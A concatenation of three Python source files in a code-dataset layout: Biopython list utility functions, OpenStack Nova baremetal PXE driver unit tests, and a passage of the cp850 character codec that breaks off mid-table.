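# header = region.read(16) # reads bytes 128..143 of the underlying file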
|
ryanraaum/oldowan.mtconvert
|
refs/heads/master
|
oldowan/mtconvert/biopython/listfns.py
|
1
|
# Copyright 2000 by Jeffrey Chang. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""This provides useful general functions for working with lists.
Functions:
asdict Make the list into a dictionary (for fast testing of membership).
items Get one of each item in a list.
count Count the number of times each item appears.
contents Calculate percentage each item appears in a list.
itemindex Make an index of the items in the list.
intersection Get the items in common between 2 lists.
difference Get the items in 1 list, but not the other.
indexesof Get a list of the indexes of some items in a list.
take Take some items from a list.
"""
def asdict(l):
"""asdict(l) -> dictionary
Return a dictionary where the keys are the items in the list, with
arbitrary values. This is useful for quick testing of membership.
"""
return count(l)
def items(l):
"""items(l) -> list of items
Generate a list of one of each item in l. The items are returned
in arbitrary order.
"""
try:
return asdict(l).keys()
except TypeError, x:
if str(x).find("unhashable") == -1:
raise
# asdict failed because l is unhashable. Back up to a naive
# implementation.
l = l[:]
l.sort()
i = 0
while i < len(l)-1:
if l[i] == l[i+1]:
del l[i]
else:
i += 1
return l
def count(items):
"""count(items) -> dict of counts of each item
Count the number of times each item appears in a list of data.
"""
c = {}
for i in items:
c[i] = c.get(i, 0) + 1
return c
def contents(items):
"""contents(items) -> dict of item:percentage
Summarize the contents of the list in terms of the percentages of each
item. For example, if an item appears 3 times in a list with 10 items,
its fraction of the list is 0.3.
"""
counts = count(items)
l = float(len(items))
contents = {}
for i, c in counts.items():
contents[i] = c / l
return contents
def intersection(l1, l2):
"""intersection(l1, l2) -> list of common items
Return a list of the items in both l1 and l2. The list is in
arbitrary order.
"""
inter = []
words1 = count(l1)
for w in l2:
if words1.has_key(w):
inter.append(w)
del words1[w] # don't add the same word twice
return inter
def difference(l1, l2):
"""difference(l1, l2) -> list of items in l1, but not l2
Return a list of the items in l1, but not l2. The list is in
arbitrary order.
"""
diff = []
words2 = count(l2)
for w in l1:
if not words2.has_key(w):
diff.append(w)
words2[w] = 1 # don't add the same word twice
return diff
def itemindex(l):
"""itemindex(l) -> dict of item : index of item
Make an index of the items in the list. The dictionary contains
the items in the list as the keys, and the index of the first
occurrence of the item as the value.
"""
dict = {}
for i in range(len(l)):
if not dict.has_key(l[i]):
dict[l[i]] = i
return dict
def indexesof(l, fn, opposite=0):
"""indexesof(l, fn) -> list of indexes
Return a list of indexes i where fn(l[i]) is true.
"""
indexes = []
for i in range(len(l)):
f = fn(l[i])
if (not opposite and f) or (opposite and not f):
indexes.append(i)
return indexes
def take(l, indexes):
"""take(l, indexes) -> list of just the indexes from l"""
items = []
for i in indexes:
items.append(l[i])
return items
def take_byfn(l, fn, opposite=0):
indexes = indexesof(l, fn, opposite=opposite)
return take(l, indexes)
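# Examples (illustrative):
#
# >>> count(['a', 'b', 'a'])
# {'a': 2, 'b': 1}
# >>> intersection([1, 2, 3], [2, 3, 4])
# [2, 3]
# >>> take(['x', 'y', 'z'], [0, 2])
# ['x', 'z']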
|
sridevikoushik31/openstack
|
refs/heads/T11906
|
nova/tests/baremetal/test_pxe.py
|
1
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for baremetal pxe driver."""
import os
import mox
from oslo.config import cfg
from testtools import matchers
from nova import exception
from nova.openstack.common.db import exception as db_exc
from nova.tests.baremetal.db import base as bm_db_base
from nova.tests.baremetal.db import utils as bm_db_utils
from nova.tests.image import fake as fake_image
from nova.tests import utils
from nova.virt.baremetal import baremetal_states
from nova.virt.baremetal import db
from nova.virt.baremetal import pxe
from nova.virt.baremetal import utils as bm_utils
from nova.virt.disk import api as disk_api
from nova.virt import fake as fake_virt
CONF = cfg.CONF
COMMON_FLAGS = dict(
firewall_driver='nova.virt.baremetal.fake.FakeFirewallDriver',
host='test_host',
)
BAREMETAL_FLAGS = dict(
driver='nova.virt.baremetal.pxe.PXE',
instance_type_extra_specs=['cpu_arch:test', 'test_spec:test_value'],
power_manager='nova.virt.baremetal.fake.FakePowerManager',
vif_driver='nova.virt.baremetal.fake.FakeVifDriver',
volume_driver='nova.virt.baremetal.fake.FakeVolumeDriver',
group='baremetal',
)
class BareMetalPXETestCase(bm_db_base.BMDBTestCase):
def setUp(self):
super(BareMetalPXETestCase, self).setUp()
self.flags(**COMMON_FLAGS)
self.flags(**BAREMETAL_FLAGS)
self.driver = pxe.PXE(fake_virt.FakeVirtAPI())
fake_image.stub_out_image_service(self.stubs)
self.addCleanup(fake_image.FakeImageService_reset)
self.context = utils.get_test_admin_context()
self.test_block_device_info = None,
self.instance = utils.get_test_instance()
self.test_network_info = utils.get_test_network_info(),
self.node_info = bm_db_utils.new_bm_node(
service_host='test_host',
cpus=4,
memory_mb=2048,
prov_mac_address='11:11:11:11:11:11',
)
self.nic_info = [
{'address': '22:22:22:22:22:22', 'datapath_id': '0x1',
'port_no': 1},
{'address': '33:33:33:33:33:33', 'datapath_id': '0x2',
'port_no': 2},
]
def _create_node(self):
self.node = db.bm_node_create(self.context, self.node_info)
for nic in self.nic_info:
db.bm_interface_create(
self.context,
self.node['id'],
nic['address'],
nic['datapath_id'],
nic['port_no'],
)
self.instance['node'] = self.node['id']
self.spawn_params = dict(
admin_password='test_pass',
block_device_info=self.test_block_device_info,
context=self.context,
image_meta=utils.get_test_image_info(None,
self.instance),
injected_files=[('/fake/path', 'hello world')],
instance=self.instance,
network_info=self.test_network_info,
)
class PXEClassMethodsTestCase(BareMetalPXETestCase):
def test_build_pxe_config(self):
args = {
'deployment_id': 'aaa',
'deployment_key': 'bbb',
'deployment_iscsi_iqn': 'ccc',
'deployment_aki_path': 'ddd',
'deployment_ari_path': 'eee',
'aki_path': 'fff',
'ari_path': 'ggg',
}
config = pxe.build_pxe_config(**args)
self.assertThat(config, matchers.StartsWith('default deploy'))
# deploy bits are in the deploy section
start = config.index('label deploy')
end = config.index('label boot')
self.assertThat(config[start:end], matchers.MatchesAll(
matchers.Contains('kernel ddd'),
matchers.Contains('initrd=eee'),
matchers.Contains('deployment_id=aaa'),
matchers.Contains('deployment_key=bbb'),
matchers.Contains('iscsi_target_iqn=ccc'),
matchers.Not(matchers.Contains('kernel fff')),
))
# boot bits are in the boot section
start = config.index('label boot')
self.assertThat(config[start:], matchers.MatchesAll(
matchers.Contains('kernel fff'),
matchers.Contains('initrd=ggg'),
matchers.Not(matchers.Contains('kernel ddd')),
))
def test_build_network_config(self):
net = utils.get_test_network_info(1)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertNotIn('eth1', config)
net = utils.get_test_network_info(2)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertIn('eth1', config)
def test_build_network_config_dhcp(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-dhcp.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0][1]['ips'][0]['ip'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet dhcp', config)
self.assertNotIn('address 1.2.3.4', config)
def test_build_network_config_static(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-static.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0][1]['ips'][0]['ip'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet static', config)
self.assertIn('address 1.2.3.4', config)
def test_image_dir_path(self):
self.assertEqual(
pxe.get_image_dir_path(self.instance),
os.path.join(CONF.instances_path, 'instance-00000001'))
def test_image_file_path(self):
self.assertEqual(
pxe.get_image_file_path(self.instance),
os.path.join(
CONF.instances_path, 'instance-00000001', 'disk'))
def test_pxe_config_file_path(self):
self.instance['uuid'] = 'aaaa-bbbb-cccc'
self.assertEqual(
pxe.get_pxe_config_file_path(self.instance),
os.path.join(CONF.baremetal.tftp_root,
'aaaa-bbbb-cccc', 'config'))
def test_pxe_mac_path(self):
self.assertEqual(
pxe.get_pxe_mac_path('23:45:67:89:AB'),
os.path.join(CONF.baremetal.tftp_root,
'pxelinux.cfg', '01-23-45-67-89-ab'))
def test_get_instance_deploy_ids(self):
self.instance['extra_specs'] = {
'deploy_kernel_id': 'aaaa',
'deploy_ramdisk_id': 'bbbb',
}
self.flags(deploy_kernel="fail", group='baremetal')
self.flags(deploy_ramdisk="fail", group='baremetal')
self.assertEqual(
pxe.get_deploy_aki_id(self.instance), 'aaaa')
self.assertEqual(
pxe.get_deploy_ari_id(self.instance), 'bbbb')
def test_get_default_deploy_ids(self):
self.instance['extra_specs'] = {}
self.flags(deploy_kernel="aaaa", group='baremetal')
self.flags(deploy_ramdisk="bbbb", group='baremetal')
self.assertEqual(
pxe.get_deploy_aki_id(self.instance), 'aaaa')
self.assertEqual(
pxe.get_deploy_ari_id(self.instance), 'bbbb')
def test_get_partition_sizes(self):
# default "kinda.big" instance
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(sizes[0], 40960)
self.assertEqual(sizes[1], 1024)
def test_swap_not_zero(self):
# override swap to 0
instance_type = utils.get_test_instance_type(self.context)
instance_type['swap'] = 0
self.instance = utils.get_test_instance(self.context, instance_type)
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(sizes[0], 40960)
self.assertEqual(sizes[1], 1)
def test_get_tftp_image_info(self):
instance_type = utils.get_test_instance_type()
# Raises an exception when options are neither specified
# on the instance nor in the configuration file
CONF.baremetal.deploy_kernel = None
CONF.baremetal.deploy_ramdisk = None
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
# Test that other non-true values also raise an exception
CONF.baremetal.deploy_kernel = ""
CONF.baremetal.deploy_ramdisk = ""
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
# Even if the instance includes kernel_id and ramdisk_id,
# we still need deploy_kernel_id and deploy_ramdisk_id.
# If those aren't present in instance[], and not specified in
# config file, then we raise an exception.
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
# If an instance doesn't specify deploy_kernel_id or deploy_ramdisk_id,
# but defaults are set in the config file, we should use those.
# Here, we confirm both that all four values were set
# and that the proper paths are getting set for all of them
CONF.baremetal.deploy_kernel = 'cccc'
CONF.baremetal.deploy_ramdisk = 'dddd'
base = os.path.join(CONF.baremetal.tftp_root, self.instance['uuid'])
res = pxe.get_tftp_image_info(self.instance, instance_type)
expected = {
'kernel': ['aaaa', os.path.join(base, 'kernel')],
'ramdisk': ['bbbb', os.path.join(base, 'ramdisk')],
'deploy_kernel': ['cccc', os.path.join(base, 'deploy_kernel')],
'deploy_ramdisk': ['dddd',
os.path.join(base, 'deploy_ramdisk')],
}
self.assertEqual(res, expected)
# If deploy_kernel_id and deploy_ramdisk_id are specified on
# image extra_specs, this should override any default configuration.
# Note that it is passed on the 'instance' object, despite being
# inherited from the instance_types_extra_specs table.
extra_specs = {
'deploy_kernel_id': 'eeee',
'deploy_ramdisk_id': 'ffff',
}
instance_type['extra_specs'] = extra_specs
res = pxe.get_tftp_image_info(self.instance, instance_type)
self.assertEqual(res['deploy_kernel'][0], 'eeee')
self.assertEqual(res['deploy_ramdisk'][0], 'ffff')
# However, if invalid values are passed on the image extra_specs,
# this should still raise an exception.
extra_specs = {
'deploy_kernel_id': '',
'deploy_ramdisk_id': '',
}
instance_type['extra_specs'] = extra_specs
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, instance_type)
class PXEPrivateMethodsTestCase(BareMetalPXETestCase):
def test_collect_mac_addresses(self):
self._create_node()
address_list = [nic['address'] for nic in self.nic_info]
address_list.append(self.node_info['prov_mac_address'])
address_list.sort()
macs = self.driver._collect_mac_addresses(self.context, self.node)
self.assertEqual(macs, address_list)
def test_cache_tftp_images(self):
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
instance_type = utils.get_test_instance_type()
extra_specs = {
'deploy_kernel_id': 'cccc',
'deploy_ramdisk_id': 'dddd',
}
instance_type['extra_specs'] = extra_specs
image_info = pxe.get_tftp_image_info(self.instance, instance_type)
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(os.path.join(CONF.baremetal.tftp_root,
self.instance['uuid'])).AndReturn(True)
for uuid, path in [image_info[label] for label in image_info]:
os.path.exists(path).AndReturn(True)
self.mox.ReplayAll()
self.driver._cache_tftp_images(
self.context, self.instance, image_info)
self.mox.VerifyAll()
def test_cache_image(self):
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(pxe.get_image_dir_path(self.instance)).\
AndReturn(True)
os.path.exists(pxe.get_image_file_path(self.instance)).\
AndReturn(True)
self.mox.ReplayAll()
image_meta = utils.get_test_image_info(
self.context, self.instance)
self.driver._cache_image(
self.context, self.instance, image_meta)
self.mox.VerifyAll()
def test_inject_into_image(self):
# NOTE(deva): we could also test this method by stubbing
# nova.virt.disk.api._inject_*_into_fs
self._create_node()
files = []
self.instance['hostname'] = 'fake hostname'
files.append(('/etc/hostname', 'fake hostname'))
self.instance['key_data'] = 'fake ssh key'
net_info = utils.get_test_network_info(1)
net = pxe.build_network_config(net_info)
admin_password = 'fake password'
self.mox.StubOutWithMock(disk_api, 'inject_data')
disk_api.inject_data(
admin_password=admin_password,
image=pxe.get_image_file_path(self.instance),
key='fake ssh key',
metadata=None,
partition=None,
net=net,
files=files, # this is what we're really testing
).AndReturn(True)
self.mox.ReplayAll()
self.driver._inject_into_image(
self.context, self.node, self.instance,
network_info=net_info,
admin_password=admin_password,
injected_files=None)
self.mox.VerifyAll()
class PXEPublicMethodsTestCase(BareMetalPXETestCase):
def test_cache_images(self):
self._create_node()
self.mox.StubOutWithMock(self.driver.virtapi, 'instance_type_get')
self.mox.StubOutWithMock(pxe, "get_tftp_image_info")
self.mox.StubOutWithMock(self.driver, "_cache_tftp_images")
self.mox.StubOutWithMock(self.driver, "_cache_image")
self.mox.StubOutWithMock(self.driver, "_inject_into_image")
self.driver.virtapi.instance_type_get(
self.context, self.instance['instance_type_id']).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn([])
self.driver._cache_tftp_images(self.context, self.instance, [])
self.driver._cache_image(self.context, self.instance, [])
self.driver._inject_into_image(self.context, self.node, self.instance,
self.test_network_info, None, '')
self.mox.ReplayAll()
self.driver.cache_images(
self.context, self.node, self.instance,
admin_password='',
image_meta=[],
injected_files=None,
network_info=self.test_network_info,
)
self.mox.VerifyAll()
def test_destroy_images(self):
self._create_node()
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
bm_utils.unlink_without_raise(pxe.get_image_file_path(self.instance))
bm_utils.rmtree_without_raise(pxe.get_image_dir_path(self.instance))
self.mox.ReplayAll()
self.driver.destroy_images(self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_bootloader_passes_details(self):
self._create_node()
macs = [nic['address'] for nic in self.nic_info]
macs.append(self.node_info['prov_mac_address'])
macs.sort()
image_info = {
'deploy_kernel': [None, 'aaaa'],
'deploy_ramdisk': [None, 'bbbb'],
'kernel': [None, 'cccc'],
'ramdisk': [None, 'dddd'],
}
self.instance['uuid'] = 'fake-uuid'
iqn = "iqn-%s" % self.instance['uuid']
pxe_config = 'this is a fake pxe config'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
image_path = pxe.get_image_file_path(self.instance)
self.mox.StubOutWithMock(self.driver.virtapi, 'instance_type_get')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(pxe, 'get_partition_sizes')
self.mox.StubOutWithMock(bm_utils, 'random_alnum')
self.mox.StubOutWithMock(pxe, 'build_pxe_config')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
self.driver.virtapi.instance_type_get(
self.context, self.instance['instance_type_id']).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn(image_info)
pxe.get_partition_sizes(self.instance).AndReturn((0, 0))
bm_utils.random_alnum(32).AndReturn('alnum')
pxe.build_pxe_config(
self.node['id'], 'alnum', iqn,
'aaaa', 'bbbb', 'cccc', 'dddd').AndReturn(pxe_config)
bm_utils.write_to_file(pxe_path, pxe_config)
for mac in macs:
bm_utils.create_link_without_raise(
pxe_path, pxe.get_pxe_mac_path(mac))
self.mox.ReplayAll()
self.driver.activate_bootloader(self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_and_deactivate_bootloader(self):
self._create_node()
instance_type = {
'extra_specs': {
'deploy_kernel_id': 'eeee',
'deploy_ramdisk_id': 'ffff',
}
}
self.instance['uuid'] = 'fake-uuid'
self.mox.StubOutWithMock(self.driver.virtapi, 'instance_type_get')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
self.driver.virtapi.instance_type_get(
self.context, self.instance['instance_type_id']).AndReturn(
instance_type)
# create the config file
bm_utils.write_to_file(mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink and link the 3 interfaces
for i in range(3):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.create_link_without_raise(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink all 3 interfaces, 4 images, and the config file
for i in range(8):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.rmtree_without_raise(mox.StrContains('fake-uuid'))
self.mox.ReplayAll()
# activate and deactivate the bootloader
# and check the deployment task_state in the database
row = db.bm_node_get(self.context, 1)
self.assertTrue(row['deploy_key'] is None)
self.driver.activate_bootloader(self.context, self.node,
self.instance)
row = db.bm_node_get(self.context, 1)
self.assertTrue(row['deploy_key'] is not None)
self.driver.deactivate_bootloader(self.context, self.node,
self.instance)
row = db.bm_node_get(self.context, 1)
self.assertTrue(row['deploy_key'] is None)
self.mox.VerifyAll()
def test_deactivate_bootloader_for_nonexistent_instance(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(self.driver, '_collect_mac_addresses')
extra_specs = dict(extra_specs=dict(deploy_ramdisk_id='ignore',
deploy_kernel_id='ignore'))
pxe.get_tftp_image_info(self.instance, extra_specs).\
AndRaise(exception.NovaException)
bm_utils.unlink_without_raise(pxe_path)
self.driver._collect_mac_addresses(self.context, self.node).\
AndRaise(db_exc.DBError)
bm_utils.rmtree_without_raise(
os.path.join(CONF.baremetal.tftp_root, 'fake-uuid'))
self.mox.ReplayAll()
self.driver.deactivate_bootloader(
self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_node(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
self.flags(pxe_deploy_timeout=1, group='baremetal')
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYING,
'instance_uuid': 'fake-uuid'})
# test timeout
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
# test DEPLOYDONE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYDONE})
self.driver.activate_node(self.context, self.node, self.instance)
# test no deploy -- state is just ACTIVE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.ACTIVE})
self.driver.activate_node(self.context, self.node, self.instance)
# test node gone
db.bm_node_destroy(self.context, 1)
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
|
ericbaze/continuum_code_2012
|
refs/heads/master
|
pydata/moin/pythonenv/local/lib/python2.7/encodings/cp850.py
|
593
|
""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp850',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
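# Usage sketch (standard codecs machinery, not specific to this module): once
# registered via the encodings package, the tables below drive str/unicode
# conversion transparently:
#
# u'\u00c7'.encode('cp850') # -> '\x80' (see 0x0080 in decoding_map)
# '\x80'.decode('cp850') # -> u'\xc7'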
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00ef, # LATIN SMALL LETTER I WITH DIAERESIS
0x008c: 0x00ee, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x008d: 0x00ec, # LATIN SMALL LETTER I WITH GRAVE
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x00f2, # LATIN SMALL LETTER O WITH GRAVE
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00ff, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00f8, # LATIN SMALL LETTER O WITH STROKE
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d8, # LATIN CAPITAL LETTER O WITH STROKE
0x009e: 0x00d7, # MULTIPLICATION SIGN
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00f1, # LATIN SMALL LETTER N WITH TILDE
0x00a5: 0x00d1, # LATIN CAPITAL LETTER N WITH TILDE
0x00a6: 0x00aa, # FEMININE ORDINAL INDICATOR
0x00a7: 0x00ba, # MASCULINE ORDINAL INDICATOR
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x00ae, # REGISTERED SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x00b6: 0x00c2, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00b7: 0x00c0, # LATIN CAPITAL LETTER A WITH GRAVE
0x00b8: 0x00a9, # COPYRIGHT SIGN
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x00a2, # CENT SIGN
0x00be: 0x00a5, # YEN SIGN
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x00e3, # LATIN SMALL LETTER A WITH TILDE
0x00c7: 0x00c3, # LATIN CAPITAL LETTER A WITH TILDE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x00a4, # CURRENCY SIGN
0x00d0: 0x00f0, # LATIN SMALL LETTER ETH
0x00d1: 0x00d0, # LATIN CAPITAL LETTER ETH
0x00d2: 0x00ca, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00d3: 0x00cb, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x00d4: 0x00c8, # LATIN CAPITAL LETTER E WITH GRAVE
0x00d5: 0x0131, # LATIN SMALL LETTER DOTLESS I
0x00d6: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x00d7: 0x00ce, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00d8: 0x00cf, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x00a6, # BROKEN BAR
0x00de: 0x00cc, # LATIN CAPITAL LETTER I WITH GRAVE
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00e3: 0x00d2, # LATIN CAPITAL LETTER O WITH GRAVE
0x00e4: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x00e5: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x00fe, # LATIN SMALL LETTER THORN
0x00e8: 0x00de, # LATIN CAPITAL LETTER THORN
0x00e9: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x00ea: 0x00db, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x00eb: 0x00d9, # LATIN CAPITAL LETTER U WITH GRAVE
0x00ec: 0x00fd, # LATIN SMALL LETTER Y WITH ACUTE
